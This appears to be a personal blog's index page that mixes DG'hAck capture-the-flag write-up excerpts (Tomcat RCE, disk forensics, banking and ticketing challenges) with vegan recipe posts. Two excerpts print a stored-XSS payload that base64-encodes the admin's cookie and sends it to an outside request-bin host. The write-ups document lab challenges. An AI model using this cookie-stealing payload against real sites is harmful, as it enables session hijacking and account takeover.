Writeup DG’hAck: Walters Blog

The challenge starts with a Minecraft blog. None of the pages look vulnerable. The URLs themselves don’t have any parameters; it’s just static HTML (e.g. /contact.html). The contact form doesn’t work: posting something returns a 404. That same 404 page discloses the server version: Apache Tomcat/9.0.0.M1. Searching for that version on Google tells us that it is vulnerable to an RCE. The exploit is available on Exploit Database.
Read more →

Writeup DG’hAck: Server Room

This challenge starts with a file, found_in_server_room.img.gz. Let’s first try to find what this file is:

    $ gunzip found_in_server_room.img.gz
    $ file found_in_server_room.img
    found_in_server_room.img: DOS/MBR boot sector; partition 1 : ID=0xc, start-CHS (0x40,0,1), end-CHS (0x3ff,3,32), startsector 8192, 524288 sectors; partition 2 : ID=0x83, start-CHS (0x3ff,3,32), end-CHS (0x3ff,3,32), startsector 532480, 3072000 sectors

So this is a disk image. Let’s try mounting it!

    $ mkdir mnt
    $ sudo mount found_in_server_room.img mnt
    NTFS signature is missing.
Read more →

Writeup DG’hAck: Up Credit

The challenge URL redirects us to an online bank. The summary tells us that we have to buy the flag for 200€! Let’s start by registering for an account. After entering our name and email, we get an account ID and a password. After logging in, we are presented with an interface that has three tabs: an activity log, a money transfer form, and a form to contact our financial advisor. Trying an XSS in the contact form quickly reveals that the bot doesn’t execute any JavaScript, but does click any link that is posted.
Read more →

Writeup DG’hAck: Internal Support 2

This is the second version of the ticketing system presented in the CTF. We are greeted with the exact same interface. So let’s try exactly the same payload:

    <svg onload="document.body.innerHTML=document.body.innerHTML.concat('<img src=\'https://enx8b5ofkwzw.x.pipedream.net/'.concat(btoa(document.cookie)).concat('\' />'))" />

After a few seconds, we manage to steal a cookie! However, we can’t use it, as the session is IP-locked. Hmm. The challenge is quite similar to the last one, so we know that the flag is probably on the home page.
Read more →

Writeup DG’hAck: Internal Support 1

The challenge presents itself as a ticketing system. After registering for an account, we are greeted with the ticket page. Trying a classic XSS (<script>alert(1)</script>) in the message field seems to work. We know that we have to log in as an admin user, so let’s try stealing the cookies:

    <svg onload="document.body.innerHTML=document.body.innerHTML.concat('<img src=\'https://eni7j9jobszxl.x.pipedream.net/'.concat(btoa(document.cookie)).concat('\' />'))" />

After a few seconds, we get a request on our request bin, which when decoded gives us the admin cookie:
Read more →

Madeleines

Recipe

Source: Madeleines sans oeufs, sans lait {vegan} - Perle en sucre

This took about 10 minutes (before waiting) and 40 min (after waiting, using a 9x mold). It’s enough for 18 smallish madeleines, and is really easy to make.

Ingredients

- 150g flour
- 100g sugar
- 4g baking powder
- 2 pinches of salt
- 110ml plant milk
- 70ml peanut oil
- 1 vanilla bean or a teaspoon of vanilla powder
- A few drops of bitter almond aroma

And if you want to wrap the bottom of the madeleines with a chocolate shell, count one square of chocolate per madeleine.
Read more →

Chocolate Salted Caramel Tart

Recipe

Source: 5 INGREDIENT CHOCOLATE SALTED CARAMEL TART | THE BEST VEGAN DESSERT

This took about 2 hours to make. It’s enough for a lot of people, and is easy to make.

Ingredients

- 250g cashew nuts
- 450g dates
- 120g + 6 tablespoons coconut oil
- 150g peanut butter (smooth if possible, mine wasn’t as smooth as in the original recipe), or almond butter
- 300g chocolate
- 6-10 tablespoons water

Steps

Blend the cashews in a mixer/food processor until they become as fine as flour.
Read more →

Vegetable Dumplings

Recipe

Source: Vegetable Dumplings (Vegan Gyoza / Potstickers) - Bianca Zapatka

This took about 2 hours to make. It’s enough for 4 people, and is easy to make, except for the original shape which I didn’t replicate. I’m not writing the recipe here, as I’m publishing this page more than a month after baking this.

Results

I’d give those a 4/5. They’re really good, but long to make for what you get, just like the ravioli I made yesterday; also the original shape, which is way better looking, is really hard to replicate.
Read more →

Ravioli

Recipe

Source: Homemade Vegan Ravioli with Pesto Cashew Cheese Filling | Sensible Plate

This took more than 2 hours to make. It’s enough for 4-5 people, and is easy to make. I’m not writing the recipe here, as I’m creating this page more than a month after baking this.

Results

I’d give those a 4.25/5. They’re good, but long to make for what you get. I’d love to try different fillings though!
Read more →

Avocado Tofu Pepper Sandwich

Recipe

Source: Baked Tofu Sandwich with Roasted Red Pepper - From the comfort of my bowl

This took about 45 min to make. It’s enough for 4 people, and is really easy to make. I’m not writing the recipe here, as I’m creating this page more than a month after baking this.

Results

This is a perfectly fine sandwich, and as such I’ll give it a 4.5/5. The catch is that it’ll only be as good as the bread you use.
Read more →